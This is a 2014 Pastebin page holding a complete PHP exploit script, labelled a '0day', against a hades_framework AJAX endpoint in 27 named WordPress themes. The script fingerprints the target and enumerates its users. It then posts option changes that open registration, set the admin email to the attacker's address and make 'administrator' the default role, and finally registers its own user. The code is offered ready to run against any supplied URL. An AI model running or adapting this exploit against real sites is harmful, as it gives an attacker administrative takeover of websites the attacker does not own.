API tools faq
paste
Advertisement
Googleinurl

[EXPLOIT]=> Wordpress -Hades Plus Add ADM / INURL - BRASIL

Googleinurl
Sep 18th, 2014
2,443
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.17 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. ----------------------------------------------------------
  4. *NAME*: Wordpress -Hades Plus Add ADM / INURL - BRASIL
  5. *TIPE*: User improper inclusion
  6. *Tested on*: Linux
  7. *EXECUTE*: php exploit.php http://www.target.us [email protected]
  8. *OUTPUT*: 0day_Hades_Plus_Framework_Add_Administrator.txtt
  9. *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
  10. *EMAIL*: [email protected]
  11. *Blog*: http://blog.inurl.com.br
  12. *Twitter*: https://twitter.com/googleinurl
  13. *Fanpage*: https://fb.com/InurlBrasil
  14. *GIT*: https://github.com/googleinurl
  15. *YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  16. *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  17. ----------------------------------------------------------
  18.  
  19. *Description:*
  20. This exploit allows an attacker to add new users through the /hades_framework/option_panel/ajax.php way sending request post completed.
  21. This failure is in bristle web 27 Themas:
  22. appius,Consultant,appius1,archin,averin,dagda,echea,felici,GantiDengantema,kmp,kmp2,themanya,liberal,liberal-media-bias,linguini,livewire,majestics,mathis,mazine,
  23. Orchestra, shopsum, shotzz, test, Viteeo, vithy, yvora, sodales.
  24. ----------------------------------------------------------
  25.  
  26. *Usage Information:*
  27. php exploit.php http://www.target.gov.us [email protected]
  28.  
  29. Logic:
  30. $ params ['email'] = 'you_email';
  31. $ params ['user'] = 'inurlbrasil';
  32.  
  33. EXPLOIT POST:
  34. values[0][name]=users_can_register&values[0][value]=1&values[1][name]=admin_email&values[1][value]={$params['email']}&values[2][name]=default_role&values[2][value]=administrator&action=save;
  35.  
  36. if (result the requisition == success) {
  37. is a possible vulnerable and sent one Feedback activation of inurlbrasil usuraio.
  38. }
  39. ----------------------------------------------------------
  40. */
  41. error_reporting(1);
  42. set_time_limit(0);
  43. ini_set('display_errors', 1);
  44. ini_set('max_execution_time', 0);
  45. ini_set('allow_url_fopen', 1);
  46. ob_implicit_flush(true);
  47. ob_end_flush();
  48.  
  49. $params = array();
  50.  
  51. $params['email'] = $argv[2];
  52. $params['user'] = 'inurlbrasil';
  53. $params['post'] = "values%5B0%5D%5Bname%5D=users_can_register&values%5B0%5D%5Bvalue%5D=1&values%5B1%5D%5Bname%5D=admin_email&values%5B1%5D%5Bvalue%5D={$params['email']}&values%5B2%5D%5Bname%5D=default_role&values%5B2%5D%5Bvalue%5D=administrator&action=save";
  54.  
  55. $corpo = file_get_contents($argv[1]);
  56. !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  57.  
  58. preg_match_all("#WordPress (.*?)/>#", $alvo_[0][0], $version);
  59. $str = str_replace('/>', '', $version[0]);
  60. $str = str_replace('"', '', $str);
  61. $users = file_get_contents("{$alvo_[0][0]}/?author=1");
  62. preg_match('/<title>(.*?)<\/title>/si', $users, $user);
  63. $wpuser = explode('|', $user[1]);
  64. $headers = get_headers($argv[1], 1);
  65. print "\r\n0x[EXPLOIT NAME]: WordPress 0day - Hades Plus Framework Add Administrator / INURL - BRASIL";
  66. print "\n--------------------------------------------------------------------------------------------------";
  67. print "\n0x[INFO]: ";
  68. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  69. print "\n0x[INFO]: ";
  70. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  71. print "\n0x[INFO]: ";
  72. is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']);
  73. print "\n0x[INFO]: ";
  74. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  75. print "\n0x[INFO]: TARGET: {$alvo_[0][0]} | WP USER: " . str_replace("\n", '', $wpuser[0]) . " | VERSION: {$str} \n";
  76.  
  77.  
  78. __request($alvo_[0][0], '/wp-content/themes/appius/hades_framework/option_panel/ajax.php', $params);
  79. __request($alvo_[0][0], '/wp-content/themes/Consultant/hades_framework/option_panel/ajax.php', $params);
  80. __request($alvo_[0][0], '/wp-content/themes/appius1/hades_framework/option_panel/ajax.php', $params);
  81. __request($alvo_[0][0], '/wp-content/themes/archin/hades_framework/option_panel/ajax.php', $params);
  82. __request($alvo_[0][0], '/wp-content/themes/averin/hades_framework/option_panel/ajax.php', $params);
  83. __request($alvo_[0][0], '/wp-content/themes/dagda/hades_framework/option_panel/ajax.php', $params);
  84. __request($alvo_[0][0], '/wp-content/themes/echea/hades_framework/option_panel/ajax.php', $params);
  85. __request($alvo_[0][0], '/wp-content/themes/felici/hades_framework/option_panel/ajax.php', $params);
  86. __request($alvo_[0][0], '/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php', $params);
  87. __request($alvo_[0][0], '/wp-content/themes/kmp/hades_framework/option_panel/ajax.php', $params);
  88. __request($alvo_[0][0], '/wp-content/themes/kmp2/hades_framework/option_panel/ajax.php', $params);
  89. __request($alvo_[0][0], '/wp-content/themes/themanya/hades_framework/option_panel/ajax.php', $params);
  90. __request($alvo_[0][0], '/wp-content/themes/liberal/hades_framework/option_panel/ajax.php', $params);
  91. __request($alvo_[0][0], '/wp-content/themes/liberal-media-bias/hades_framework/option_panel/ajax.php', $params);
  92. __request($alvo_[0][0], '/wp-content/themes/linguini/hades_framework/option_panel/ajax.php', $params);
  93. __request($alvo_[0][0], '/wp-content/themes/livewire/hades_framework/option_panel/ajax.php', $params);
  94. __request($alvo_[0][0], '/wp-content/themes/majestics/hades_framework/option_panel/ajax.php', $params);
  95. __request($alvo_[0][0], '/wp-content/themes/mathis/hades_framework/option_panel/ajax.php', $params);
  96. __request($alvo_[0][0], '/wp-content/themes/mazine/hades_framework/option_panel/ajax.php', $params);
  97. __request($alvo_[0][0], '/wp-content/themes/Orchestra/hades_framework/option_panel/ajax.php', $params);
  98. __request($alvo_[0][0], '/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php', $params);
  99. __request($alvo_[0][0], '/wp-content/themes/shotzz/hades_framework/option_panel/ajax.php', $params);
  100. __request($alvo_[0][0], '/wp-content/themes/test/hades_framework/option_panel/ajax.php', $params);
  101. __request($alvo_[0][0], '/wp-content/themes/Viteeo/hades_framework/option_panel/ajax.php', $params);
  102. __request($alvo_[0][0], '/wp-content/themes/vithy/hades_framework/option_panel/ajax.php', $params);
  103. __request($alvo_[0][0], '/wp-content/themes/yvora/hades_framework/option_panel/ajax.php', $params);
  104. __request($alvo_[0][0], '/wp-content/themes/sodales/hades_framework/option_panel/ajax.php', $params);
  105.  
  106. function __request($url, $plugin, $params) {
  107.  
  108.     $objcurl = curl_init();
  109.     curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
  110.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  111.     curl_setopt($objcurl, CURLOPT_HEADER, 0);
  112.     curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
  113.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  114.         'Accept: application/json, text/javascript, */*; q=0.01',
  115.         'X-Requested-With: XMLHttpRequest',
  116.         "Referer: {$url}",
  117.         'Accept-Language: en-US,en;q=0.5',
  118.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  119.     ));
  120.     curl_setopt($objcurl, CURLOPT_REFERER, $url . $plugin);
  121.     curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']);
  122.  
  123.     $corpo = curl_exec($objcurl);
  124.     curl_close($objcurl);
  125.  
  126.     if (strstr($corpo, 'success')) {
  127.  
  128.         $res = "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n0x[INFO][VULN]: [ " . date("d-m-Y H:i:s") . " ]\n";
  129.         $res.= "\n0x[INFO][VULN]: {$url}{$plugin} - RETURN=> [ {$corpo} ] / {$params['user']}, EMAIL=> " . urldecode($params['email']);
  130.         $res.= "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n";
  131.         print $res;
  132.         $admin['post'] = urlencode("user_login={$params['user']}&user_email={$params['email']}&redirect_to=&wp-submit=Inscription");
  133.         (strstr($corpo, 'success') ? __request($url, '/wp-login.php?action=register', $admin) : NULL);
  134.         file_put_contents('0day_Hades_Plus_Framework_Add_Administrator.txt', "{$res}\n", FILE_APPEND);
  135.     } else {
  136.         print (($plugin != '/wp-login.php?action=register') ?  "\n0x[INFO][NOT VULN]: {$url}{$plugin} "  : NULL);
  137.     }
  138. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!